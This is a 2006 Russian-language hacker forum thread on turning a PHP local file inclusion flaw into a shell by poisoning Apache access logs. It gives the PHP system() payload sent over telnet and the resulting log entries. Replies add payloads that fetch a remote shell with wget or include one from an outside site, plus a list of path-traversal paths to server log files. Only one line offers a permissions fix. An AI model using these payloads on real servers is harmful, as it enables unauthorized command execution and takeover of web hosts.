Локальный include как способ получть шелл

Goudini · 03.11.2006

Получение шела при локальном инклуде

Часто когда находится уязвимость локального инклуда, но паролей от базы данных нет, или есть, но к фтп не подошли, а база пускает только с localhost, дополнительные дыры в скриптах не найдены.... Казалось бы всё пропало, но если есть доступ к файлу журналов Веб-сервера access.log или error.log, можно получить шелл

Запускаем telnet localhost 80

Код:

GET <? system($cmd); ?>

Теперь в файле останется запись похожая не эту

Код:

127.0.0.1 - - [31/Aug/2006:22:36:29 +0300] "GET <? system($cmd); ?>" 400 414

Как видите всё передалось в чистом виде.
Теперь если к основному скрипту подключить файл логов, то возможно он будет выполнен как php-код
Смотрим.. Вуаля

Код:

127.0.0.1 - - [31/Aug/2006:22:36:29 +0300] "GET 

Undefined variable: cmd in \usr\local\apache\logs\access.log on line 1
Warning: system(): Cannot execute a blank command in \usr\local\apache\logs\access.log on line 1

Можем выполнять команды.
Для решения данной уязвимости, нужно разрешить просмотр конфигурационных файлов только пользователю root

Код:

chown -R root:root /usr/local/apache
chmod -R o-rwx /usr/local/apache

Goudini

Great · 03.11.2006

то возможно он будет выполнен как php-код

Не возможно, а точно

ЗЫ. Оригинально %)

G1UK · 03.11.2006

Ребят, вы чего, это же БАЯН, уж раз 10 натыкался на это...

Зачем писать <? system("$cmd") ?> ?
Проще сразу - <? system("wget \\adres\\shella -o out.php");

Хотя, не зная версии операционки... ХЗ но имхо 2 вариант лучше, сразу шелл будет, а если не получиться, тогда уж, узнавать что за ОС

k1b0rg · 03.11.2006

Статья баянная но очень интересная.

G1uk

проще всего, внезависимости от ОС, <?include"http://site.ru/shell.txt";?>

rof · 03.11.2006

первый пост - баян

кстати может кому пригодится:

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

Goudini · 03.11.2006

Ладно, вот ещё по теме

Hell Knights Crew:
http://hellknights.void.ru/articles/0x48k-...injattacks.html

milw0rm
iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit
PHPList <= 2.10.2 GLOBALS[] Remote Code Execution Exploit
phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit

lance · 05.11.2006

Старая тема. Как минимум в 3 статьях видел. Зато работает ;-)

Локальный include как способ получть шелл

Goudini

HDD-drive

Great

CPU register

G1UK

floppy-диск

k1b0rg

RAID-массив

rof

CD-диск

Goudini

HDD-drive

lance

(L3) cache